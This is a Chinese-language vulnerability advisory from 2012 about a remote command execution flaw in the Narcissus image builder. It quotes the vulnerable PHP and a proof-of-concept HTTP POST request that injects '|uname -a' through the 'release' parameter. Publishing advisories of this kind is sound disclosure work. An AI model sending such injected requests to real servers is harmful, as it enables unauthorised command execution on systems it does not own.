Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Narcissus远程命令执行漏洞

发布日期:2012-10-30
更新日期:2012-12-04受影响系统:
angstrom-distribution Narcissus
描述:
--------------------------------------------------------------------------------
Narcissus是在线图像汇编器。Narcissus在实现上存在安全漏洞,没有正确过滤nartcissus/backend.php内 "release"参数值,可导致远程执行任意系统命令。<*来源:vendor
 
  链接:http://www.osvdb.org/87410
        http://www.exploit-db.com/exploits/22709/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负![ Remote Command Execution ]
#
# File: /narcissus/backend.php ( lines: 10-183 ):
# ..cut..
# if (isset($_POST["action"]) && $_POST["action"] != "") {
#  $action = $_POST["action"];                              // 1
# } else {
#  print "Invalid action: $action";
#  exit;
# }
#
# if (isset($_POST["machine"])) {
#  $machine = escapeshellcmd(basename($_POST["machine"]));  // 2
# } else {
#  print "Invalid machine";
#  exit;
# }
# ..cut..
# if (isset($_POST["release"]) && $_POST["release"] != "") {
#  $release = $_POST["release"];                            // 3
# } else {
#  $release = "stable";
# }
# ..cut..
# switch($action) {
# ..cut..
#  case "configure_image":                                  // 4
#   print "configuring ";
#   configure_image($machine, $name, $release);         // 5
#   break;
# ..cut..
# function configure_image($machine, $name, $release) {
#  print "Machine: $machine, name: $name ";
#  passthru ("scripts/configure-image.sh $machine $name-image $release && exit");  // 6 [RCE]
# }
# ..cut..
#
# Vuln:
# http://localhost/narcissus/backend.php
#
# POST /narcissus/backend.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/16.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: pl,en-us;q=0.7,en;q=0.3
# Accept-Encoding: gzip, deflate
# Connection: keep-alive
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 50
# machine=0&action=configure_image&release=|uname -a
#
### [ dun / 2012 ] #######################################建议:
--------------------------------------------------------------------------------
厂商补丁:angstrom-distribution
---------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:https://github.com/Angstrom-distribution/SmartCMS SQL注入和跨站脚本漏洞phpMyNewsLetter多个跨站脚本漏洞相关资讯      远程命令执行漏洞  Narcissus安全漏洞 
  • Smartphone Pentest Framework多个  (12/12/2012 09:00:06)
  • Webmin /file/show.cgi远程命令执  (10/24/2012 11:53:43)
  • Toshiba ConfigFree "CF7"文件远程  (09/25/2012 06:38:48)
  • Cisco WAG120N多个远程命令执行漏  (11/24/2012 11:44:52)
  • QNX QCONN远程命令执行漏洞  (10/18/2012 06:17:18)
  • GIMP远程命令执行漏洞  (08/21/2012 06:33:42)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款